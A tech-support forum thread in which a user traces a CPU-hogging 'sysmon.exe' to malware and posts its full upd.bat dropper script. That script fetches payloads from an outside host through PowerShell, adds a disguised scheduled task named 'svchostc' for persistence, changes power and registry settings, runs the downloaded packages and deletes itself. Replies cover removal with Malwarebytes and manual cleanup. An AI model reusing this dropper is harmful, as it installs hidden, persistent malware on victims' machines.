Jump to content

Weird process using 50% of my cpu

Go to solution Solved by ciprian97pop,
10 hours ago, Syntaxvgm said:

Its a system process but a little more jamaican

 

10 hours ago, Enderman said:

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.

 

10 hours ago, emosun said:

that... really makes me not want to use windows 10 lol

Hi again

 

So... yeah..

Today I installed malware-bytes and let's just say that that wasn't a windows event reporter

image.png.d6d28f08c802d44058fec931812dab43.png

 

Again, thank you guys for your involvement 

Hello everyone

Today I noticed a weird process showing up in task manager, that's constantly consuming 45-50% of my cpu all the time

The process is called sysmon.exe and i'm aware of it since a few hours ago.

Everytime i kill the process it comes back.

It also creates the .exe in the appdata/temp folder 

I've searched online but i didn't find almost anything about it.

Also, I'm in the process of downloading an antivirus (used windows defender because i don't download or use suspicious stuff) 

I also thought that it might be some sort of coin miner but it wasn't using any internet

Here's a screenshot of it:

image.png.61f335cac556f1d9e4ee19c1bf6eca46.png

 

Also, here's the path to the file

image.png.3c4e68df65e0a920bd0668986ca5d32f.png

 

UPDATE:

After some more digging, i found out that everytime, it creates a temp_XXXX folder (wher xxxx are random numbers) and in that folder it also creates 3 .bat files

image.png.3a6fb1b9ce62b4e96adb4247e4512ac0.png

The start.bat file is just running the build.bat file but here's what i found when i opened the build.bat file

image.png.e9402fcafa7e7f61a1d48832ef66c8c2.png

 

At this point i'm 99% sure that this is some kind of coin miner/malware

Here comes the fun part

This is what i found when I opened the upd.bat file

<spoiler>

ping www.google.com -n 1 -w 1000
if %errorlevel% == 1 ( exit )
if not exist "%TEMP%\7za.exe" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/7za.exe -OutFile \"%TEMP%\7za.exe\""
)
if not exist "%TEMP%\ppuarchive4.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31 fg1x2. org/packagenew_unsigned.zip -OutFile \"%TEMP%\ppuarchive4.zip\""
)
if not exist "%TEMP%\bcmuarchive12.zip" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. org/packagehwloc_unsigned.zip -OutFile \"%TEMP%\bcmuarchive12.zip\""
)
if not exist "%TEMP%\tmg.ps1" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f g1x2. o rg/trackermagic.ps1 -OutFile \"%TEMP%\tmg.ps1\""
)
if not exist "%TEMP%\opokl.txt" (
    PowerShell -NoLogo -Command "Invoke-WebRequest -Uri http://31b4bd 31fg1x2 .o rg/svchostc_task.xml -OutFile \"%TEMP%\svctask.xml\""
    PowerShell -NoLogo -Command "(gc \"%TEMP%\svctask.xml\") -replace 'LOCALAPPDATA', '%LOCALAPPDATA%' | Out-File \"%TEMP%\svctask.xml\""
    schtasks /Create /xml "%TEMP%\svctask.xml" /tn "svchostc" /F
    del "%TEMP%\svctask.xml"
    echo a > "%TEMP%\opokl.txt"
)
if not exist "%LOCALAPPDATA%\WindowsDefenderTemp\update.vbs" (
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31f  g1x2. o rg/batch bot.vbs -OutFile \"%TEMP%\batchbot.vbs\""
    PowerShell -Command "Invoke-WebRequest -Uri http://31b4bd31fg 1x2.or g/batchinstaller.bat -OutFile \"%TEMP%\batchinstaller.bat\""
    PowerShell -Command "Invok e-WebRequest -Uri http://31b4bd 31fg1x2.o rg/batchtask.xml -OutFile \"%TEMP%\batchtask.xml\""
    "%TEMP%\batchinstaller.bat" 
)
set list=FDBBBAD251AD958202EBB8D72746CEDC85DA45F2 8763B0C12D08BF29E40929B97A05D89721F8387D 4F4BA35DCA24DFA59E3CAADEA01C1094A1D0DB9F 39999E1648D457EC986B80CA2319C3B3E6B6C26B D0011BD12AA2D97084AC8D9E08FAA4C7307D616C EEFD9416DF1F743F26CD0B695C437626D951D752 FA58AD3904381B2E35CD233CD3DEFB13DB83FDC7 92B60DF728B47048D8354AB9C96ADCD60B25B01A 77E386B5AB1046DD872394DED2C93B312B93EAD1
(for %%a in (%list%) do ( 
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.leechers-paradise.org 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" tracker.coppersurfer.tk 6969 %%a 90
    powershell -NoLogo -ExecutionPolicy Bypass -File "%TEMP%\tmg.ps1" exodus.desync.com 6969 %%a 90
))
powercfg /SETACVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 0012ee47-9041-4b5d-9b77-535fba8b1442 6738e2c4-e8a5-4a42-b16a-e040e769756e 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 29f6c1db-86da-48c5-9fdb-f2b67b1f44da 0
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 9d7815a6-7ee4-497e-8888-515a05f02364 0
powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\GraphicsDrivers" /v TdrDelay /t REG_SZ /d "8" /f
if not exist "%LOCALAPPDATA%\svc10.17134\d.txt" (
    "%TEMP%\7za.exe" x "%TEMP%\ppuarchive4.zip" -o"%~dp0" -y
    "%~dp0\packagenew\buildpassive.bat"
    echo d > "%LOCALAPPDATA%\svc10.17134\d.txt"
    rmdir /s /q "%~dp0\packagenew"
)
taskkill /f /im sysmon.exe
::tasklist /FI "IMAGENAME eq sysmon.exe" 2>NUL | find /I /N "sysmon.exe">NUL
::if "%ERRORLEVEL%"=="0" exit
"%TEMP%\7za.exe" x "%TEMP%\bcmuarchive12.zip" -o"%~dp0" -y
"%~dp0\packagehwloc\start.bat"
start /b "" cmd /c del "%~dp0\upd.bat"&exit /b

 

</spoiler>

 

Yeah, so it surely is a virus or some sort of malware

Could someone explain me what that code does? It would help alot

Also, any suggestions would be greatly appreciated.

 

Thank you

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              

Link to comment
Share on other sites

Link to post
Share on other sites

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

1 minute ago, Enderman said:

t's part of windows.

that... really makes me not want to use windows 10 lol

Link to comment
Share on other sites

Link to post
Share on other sites

2 minutes ago, Enderman said:

Are you sure? 

 

why would it need to consume that much cpu if it's just some event monitor

I also read that article but didn't thought much of it

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              

Link to comment
Share on other sites

Link to post
Share on other sites

Just now, emosun said:

that... really makes me not want to use windows 10 lol

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

Its a system process but a little more jamaican

muh specs 

Gaming and HTPC (reparations)- ASUS 1080, MSI X99A SLI Plus, 5820k- 4.5GHz @ 1.25v, asetek based 360mm AIO, RM 1000x, 16GB memory, 750D with front USB 2.0 replaced with 3.0  ports, 2 250GB 850 EVOs in Raid 0 (why not, only has games on it), some hard drives

Screens- Acer preditor XB241H (1080p, 144Hz Gsync), LG 1080p ultrawide, (all mounted) directly wired to TV in other room

Stuff- k70 with reds, steel series rival, g13, full desk covering mouse mat

All parts black

Workstation(desk)- 3770k, 970 reference, 16GB of some crucial memory, a motherboard of some kind I don't remember, Micomsoft SC-512N1-L/DVI, CM Storm Trooper (It's got a handle, can you handle that?), 240mm Asetek based AIO, Crucial M550 256GB (upgrade soon), some hard drives, disc drives, and hot swap bays

Screens- 3  ASUS VN248H-P IPS 1080p screens mounted on a stand, some old tv on the wall above it. 

Stuff- Epicgear defiant (solderless swappable switches), g600, moutned mic and other stuff. 

Laptop docking area- 2 1440p korean monitors mounted, one AHVA matte, one samsung PLS gloss (very annoying, yes). Trashy Razer blackwidow chroma...I mean like the J key doesn't click anymore. I got a model M i use on it to, but its time for a new keyboard. Some edgy Utechsmart mouse similar to g600. Hooked to laptop dock for both of my dell precision laptops. (not only docking area)

Shelf- i7-2600 non-k (has vt-d), 380t, some ASUS sandy itx board, intel quad nic. Currently hosts shared files, setting up as pfsense box in VM. Also acts as spare gaming PC with a 580 or whatever someone brings. Hooked into laptop dock area via usb switch

Link to comment
Share on other sites

Link to post
Share on other sites

Thank you guys for your replies

I will stop killing the process and let it run hoping it will disappear soon.

Just hoping that i won't have the surprise of turning on my laptop tomorrow morning and finding everything encrypted

 

P.S.: Making a backup on google drive with my most important files just to be safe

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              

Link to comment
Share on other sites

Link to post
Share on other sites

2 minutes ago, Enderman said:

If it's using 50% CPU then there some problem with the OS.

i agree. so.... makes me not want to use windows 10 lol

honestly I have never seen a system process use 50% of my cpu power ever , I can't imagine what needs PROCESSING that much for just OS maintenance. I understand maybe the drive being busy moving files around or possibly the network downloading an update , but the cpu? is it folding proteins or something? lol

Link to comment
Share on other sites

Link to post
Share on other sites

Just now, emosun said:

i agree. so.... makes me not want to use windows 10 lol

honestly I have never seen a system process use 50% of my cpu power ever , I can't imagine what needs PROCESSING that much for just OS maintenance. I understand maybe the drive being busy moving files around or possibly the network downloading an update , but the cpu? is it folding proteins or something? lol

Background updates often take 50-100% CPU, there are plenty of things the OS does in the background, everything from OS changes, drivers, security scans, etc.

Maybe it's time for OP to do a clean install if it isn't going away on it's own or with restarts.

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

1 minute ago, Enderman said:

Background updates often take 50-100% CPU

wow that would really drive me nuts. lol

Again i'm not sure what would take that much cpu power. I can't help but feel they are just sneaking cpu usage in there to mine coins or something. I feel like if your cpu is spending 100% of it's power just trying to stay safe it almost negates having a computer. lol , a discussion for another time.

Link to comment
Share on other sites

Link to post
Share on other sites

Just now, emosun said:

wow that would really drive me nuts. lol

Again i'm not sure what would take that much cpu power. I can't help but feel they are just sneaking cpu usage in there to mine coins or something. I feel like if your cpu is spending 100% of it's power just trying to stay safe it almost negates having a computer. lol , a discussion for another time.

Usually it only lasts a few minutes or seconds though...

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

10 hours ago, Syntaxvgm said:

Its a system process but a little more jamaican

 

10 hours ago, Enderman said:

It's literally a part of the security to prevent malware...

If it's using 50% CPU then there some problem with the OS.

Usually in cases like these you can leave it for a few hours until it finishes whatever it's doing and then goes back to 0%, but sometimes stuff gets stuck if you try forcing it to terminate or other reasons.

 

10 hours ago, emosun said:

that... really makes me not want to use windows 10 lol

Hi again

 

So... yeah..

Today I installed malware-bytes and let's just say that that wasn't a windows event reporter

image.png.d6d28f08c802d44058fec931812dab43.png

 

Again, thank you guys for your involvement 

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              

Link to comment
Share on other sites

Link to post
Share on other sites

it was sitting in the temp folder so yeah definitely not a real system process.

Link to comment
Share on other sites

Link to post
Share on other sites

9 hours ago, ciprian97pop said:

 

Again, thank you guys for your involvement 

Huh wow...

And it's gone now?

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

3 hours ago, Enderman said:

Huh wow...

And it's gone now?

Yep.

Malware-bytes got rid of it

I will keep doing some daily scans until next week just to be sure

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              

Link to comment
Share on other sites

Link to post
Share on other sites

4 minutes ago, ciprian97pop said:

Yep.

Malware-bytes got rid of it

I will keep doing some daily scans until next week just to be sure

How did you even manage to get malware that bad...

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

13 hours ago, Enderman said:

How did you even manage to get malware that bad...

I... I really don't know.

It's more embarrassing as i work as a system administrator and I should be the one stopping things like this from happening.

If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that

AMD Athlon X4 750k; Gigabyte F2A88XM-DS2; 8Gb Corsair XMS 1600 Mhz; AMD Hd5670 1Gb DDR3; Bequiet E6-600W; W7 Ultimate x64

#KILLEDMYWIFE                                                                                                                                                                                                                         so miner; very doge; much value   

Dell Vostro 5470: i5 4200U Nvidia GT740m 2Gb 14" 1366x768 Kingston V300 120Gb                                                                                              

Link to comment
Share on other sites

Link to post
Share on other sites

8 hours ago, ciprian97pop said:

I... I really don't know.

It's more embarrassing as i work as a system administrator and I should be the one stopping things like this from happening.

If I think a bit, I might have gotten this a few days earlier when I did some data recovery for a company. They had a few bad drives that weren't recognized in windows so I used testdisk to recover some files. Maybe that was the moment in which I got that

Welp, we both learnt something new today...

NEW PC build: Blank Heaven   minimalist white and black PC     Old S340 build log "White Heaven"        The "LIGHTCANON" flashlight build log        Project AntiRoll (prototype)        Custom speaker project

Spoiler

Ryzen 3950X | AMD Vega Frontier Edition | ASUS X570 Pro WS | Corsair Vengeance LPX 64GB | NZXT H500 | Seasonic Prime Fanless TX-700 | Custom loop | Coolermaster SK630 White | Logitech MX Master 2S | Samsung 980 Pro 1TB + 970 Pro 512GB | Samsung 58" 4k TV | Scarlett 2i4 | 2x AT2020

 

Link to comment
Share on other sites

Link to post
Share on other sites

  • 3 weeks later...

I had the same trouble. Sysmon.exe using 50-60% process. It came with Visual Studio.

 

Here's what I did to get rid of it:

 

  1. End Task the Sysmon.exe from the Task Manager (Didn't work, it pops up after some time and downloads loads of file in TEMP.)
  2. Delete the files from the temp folder of Sysmon.exe (Didn't work, pops after some time. again)
  3. By this time deleting files and searching in sites (no answer nowhere).
  4. Thought there must be some process running in the background that does this. (Download Process Monitor and log the folder temp)
  5. Found the culprit.
  6. Here is the answer (Links to Superuser).

//SOLVED

If you don't want to visit Superuser.

 

The problem is with the secret process running. Go to details of task manager. And look for svchostc.exe not svchost.exe (notice extra 'c'?). Yeah, this process downloaded the bat file and started the whole mess. Go to its original location, delete it - end the process and DONE. Also, clean up the registry and delete the files from %temp% folder.

 

srymt.png

BKlRW.png

Link to comment
Share on other sites

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×